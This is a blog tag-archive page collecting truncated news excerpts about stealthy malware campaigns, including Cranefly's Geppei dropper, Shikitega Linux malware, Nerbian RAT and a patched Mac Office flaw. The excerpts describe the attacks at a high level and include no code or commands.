Tag Archive for: Stealthy

Symantec researchers find new hacking tools used in stealthy ‘Cranefly’ campaign

/in


A new research paper released today by Symantec, a division of Broadcom Inc., details previously unknown tools and techniques used in a stealthy campaign by a suspected threat actor.

A dropper called Trojan.Geppei is being used by a threat actor Symantec has dubbed “Cranefly” (UNC3524) to install previously undocumented malware known as Denfuan and other tools. Danfuan is described as using the novel technique of reading commands from Internet Information Services logs, something Symantec’s researchers have never seen used in real-world attacks before.

The Cranefly attack group was first detected by researchers at Mandiant in May and was described as heavily targeting the emails of employees that dealt with corporate development, mergers and acquisitions and large corporate transactions.

Standing out from typical attack groups, Cranefly has a particularly long dwell time, often spending at least 18 months on a victim’s network while staying under the radar. Avoidance techniques include installing backdoors on appliances that don’t support security tools, such as SANS arrays, load balancers and wireless access point controllers.

The Geppei Trojan uses PyInstaller to convert a Python script to an executable file and reads commands from legitimate IIS logs. IIS logs record data from IIS, such as web pages and apps, with the attackers able to send commands to a compromised web server by disguising them as web access requires. IIS logs them as normal, but the Geppei can read them as commands.

Geppei’s commands contain malicious encoded .ashx files. The files are saved to an arbitrary folder and run as backdoors, with some strings not appearing in the IIS log files. The same files are used for malicious HTTP request parsing by Geppei.

The backdoors dropped by Geppei include Hacktool. Regeorg, a known form of malware that can create a SOCK proxy, but that’s not the interesting one. The previously unknown Trojan virus Danfuan is a DynamicCodeCompiler that compiles and executes C# code, is based on .NET dynamic compilation technology and dynamically compiles code in memory, delivering a backdoor to infected systems.

Just who is behind Cranefly and Danfuan is…

Source…

New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices

/in


New Stealthy Shikitega Malware

A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads.

“An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist,” AT&T Alien Labs said in a new report published Tuesday.

The findings add to a growing list of Linux malware that has been found in the wild in recent months, including BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework.

CyberSecurity

Once deployed on a targeted host, the attack chain downloads and executes the Metasploit’s “Mettle” meterpreter to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and ultimately launches a cryptocurrency miner on infected devices.

The exact method by which the initial compromise is achieved remains unknown as yet, but what makes Shikitega evasive is its ability to download next-stage payloads from a command-and-control (C2) server and execute them directly in memory.

New Stealthy Shikitega Malware

Privilege escalation is achieved by means of exploiting CVE-2021-4034 (aka PwnKit) and CVE-2021-3493, enabling the adversary to abuse the elevated permissions to fetch and execute the final stage shell scripts with root privileges to establish persistence and deploy the Monero crypto miner.

CyberSecurity

In a further attempt to fly under the radar, the malware operators employ a “Shikata ga nai” polymorphic encoder to make it more difficult to detect by antivirus engines and abuse legitimate cloud services for C2 functions.

“Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection,” AT&T Alien Labs researcher Ofer Caspi said.

“Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload.”

Source…


[the_ad_group id="27628"]

New stealthy Nerbian RAT malware spotted in ongoing attacks

/in


malware

A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.

The new malware variant is written in Go, making it a cross-platform 64-bit threat, and it’s currently distributed via a small-scale email distribution campaign that uses document attachments laced with macros.

The email campaigns were discovered by researchers at Proofpoint, who released a report today on the new Nerbian RAT malware.

Impersonating the WHO

The malware campaign distributing Nerbian RAT impersonates the World Health Organization (WHO), which is allegedly sending COVID-19 information to the targets.

Phishing email seen in the latest campaign
Phishing email seen in the latest campaign (Proofpoint)

The RAR attachments contain Word documents laced with malicious macro code, so if opened on Microsoft Office with content set to “enabled,” a bat file performs a PowerShell execution step to download a 64-bit dropper.

The dropper, named “UpdateUAV.exe,” is also written in Golang and is packed in UPX to keep the size manageable.

UpdateUAV reuses code from various GitHub projects to incorporate a rich set of anti-analysis and detection-evasion mechanisms before Nerbian RAT is deployed.

Apart from that, the dropper also establishes persistence by creating a scheduled task that launches that RAT every hour.

Proofpoint summarizes the list of anti-analysis tools as follows:

  • Check for the existence of reverse engineering or debugging programs in the process list
  • Check for suspicious MAC addresses
  • Check the WMI strings to see if disk names are legitimate
  • Check if the hard disk size is below 100GB, which is typical for virtual machines
  • Check if there are any memory analysis or tampering detection programs present in the process list
  • Check the amount of time elapsed since execution and compare it with a set threshold
  • Use the IsDebuggerPresent API to determine if the executable is being debugged

All these checks make it practically impossible to get the RAT running in a sandboxed, virtualized environment, ensuring long-term stealthiness for the malware operators.

Nerbian RAT features

The trojan is downloaded as “MoUsoCore.exe” and is saved to…

Source…

An ’80s File Format Enabled Stealthy Mac Hacking

/in

The now-patched vulnerability would have let hackers target Microsoft Office using Symbolic Link—a file type that hasn’t been in common use in over 30 years.
mac hacker – read more